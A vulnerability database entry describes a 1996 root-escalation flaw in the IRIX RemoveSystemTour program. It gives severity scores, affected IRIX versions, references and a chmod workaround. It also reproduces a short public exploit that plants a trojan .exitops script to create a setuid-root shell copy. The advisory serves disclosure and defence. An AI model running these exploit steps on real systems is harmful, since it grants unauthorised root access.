Published: 1996-10-30 00:00:00
Revised: 2016-10-17 22:03:53

[Original] Indigo Magic System Tour in the SGI system tour package (systour) for IRIX 5.x through 6.3 allows local users to gain root privileges via a Trojan horse .exitops program, which is called by the inst command that is executed by the RemoveSystemTour program.

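[CNNVD] IRIX SGI system tour package (systour) Indigo Magic System Tour permissions and access control vulnerability (CNNVD-199610-009)

        Indigo Magic System Tour in the SGI system tour package (systour) for IRIX 5.x through 6.3 contains a vulnerability. Local users can gain root privileges via a Trojan horse .exitops program, which is invoked by the inst command that the RemoveSystemTour program executes.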

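- CVSS (base score)

CVSS score: 7.2 [Severe (HIGH)]
Confidentiality impact: COMPLETE [total information disclosure, exposing all system files]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may cause complete system downtime]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [exploitation requires no authentication]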

- CPE (affected platforms and products)

cpe:/o:sgi:irix:6.0.1  SGI IRIX 6.0.1
cpe:/o:sgi:irix:6.1  SGI IRIX 6.1
cpe:/o:sgi:irix:5.2  SGI IRIX 5.2
cpe:/o:sgi:irix:5.1.1  SGI IRIX 5.1.1
cpe:/o:sgi:irix:6.0.1::xfs  SGI IRIX 6.0.1 XFS
cpe:/o:sgi:irix:6.2  SGI IRIX 6.2
cpe:/o:sgi:irix:5.1  SGI IRIX 5.1
cpe:/o:sgi:irix:6.0  SGI IRIX 6.0
cpe:/o:sgi:irix:5.0.1  SGI IRIX 5.0.1
cpe:/o:sgi:irix:5.3  SGI IRIX 5.3
cpe:/o:sgi:irix:6.3  SGI IRIX 6.3
cpe:/o:sgi:irix:5.3::xfs  SGI IRIX 5.3 XFS

- OVAL (technical details for detection)


- Official database links
(Official data source) MITRE
(Official data source) NVD
(Official data source) CNNVD

- Other links and resources
(VENDOR_ADVISORY)  SGI  19961101-01-I
(UNKNOWN)  BUGTRAQ  19961030 (Another) vulnerability in new SGIs
(UNKNOWN)  XF  irix-systour(7456)

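- Vulnerability information

IRIX SGI system tour package (systour) Indigo Magic System Tour permissions and access control vulnerability
High risk  Unknown
1996-10-30 00:00:00 2005-05-02 00:00:00
        Indigo Magic System Tour in the SGI system tour package (systour) for IRIX 5.x through 6.3 contains a vulnerability. Local users can gain root privileges via a Trojan horse .exitops program, which is invoked by the inst command that the RemoveSystemTour program executes.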

- Advisories and patches


- Vulnerability information (19356)

SGI IRIX <= 6.3 Systour and OutOfBox Vulnerabilities (EDBID:19356)
irix local
1996-10-30 Verified
0 Tun-Hui Hu
N/A

A vulnerability exists in both the Systour and OutOfBox subsystems included with new installs of IRIX 5.x and 6.x from SGI. This vulnerability allows users on the system to run arbitrary commands as root.

$ rbase=$HOME; export rbase
$ mkdir -p $HOME/var/inst
$ echo "dryrun: true" > $HOME/.swmgrrc
$ cp -p /bin/sh /tmp/foobar
$ printf '#\!/bin/sh\nchmod 4777 /tmp/foobar\n' > $HOME/var/inst/.exitops
$ chmod a+x $HOME/var/inst/.exitops
$ /usr/lib/tour/bin/RemoveSystemTour
Executing outstanding exit-commands from previous session ..
Successfully completed exit-commands from previous session.
Reading installation history
Checking dependencies
ERROR : Software Manager: automatic installation failed: New
target (nothing installed) and no distribution. 		

- Vulnerability information

IRIX RemoveSystemTour .exitops Privilege Escalation
Local Access Required Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability description

IRIX contains a flaw that may allow a malicious user to gain unauthorized privileges. The issue is triggered when a malicious user manipulates environment variables and configuration files to trick the RemoveSystemTour program, which is setuid root, into executing a trojan horse. It is possible that the flaw may allow root privileges resulting in a loss of integrity.

- Timeline

1996-10-30 Unknown
1996-10-30 Unknown

- Solution

Currently, there are no known upgrades or patches to correct this issue. It is possible to correct the flaw by implementing the following workaround:

# /bin/chmod u-s /usr/lib/tour/bin/RemoveSystemTour
# /bin/chmod u-s /usr/people/tour/oob/bin/oobversions

- Related references

- Vulnerability author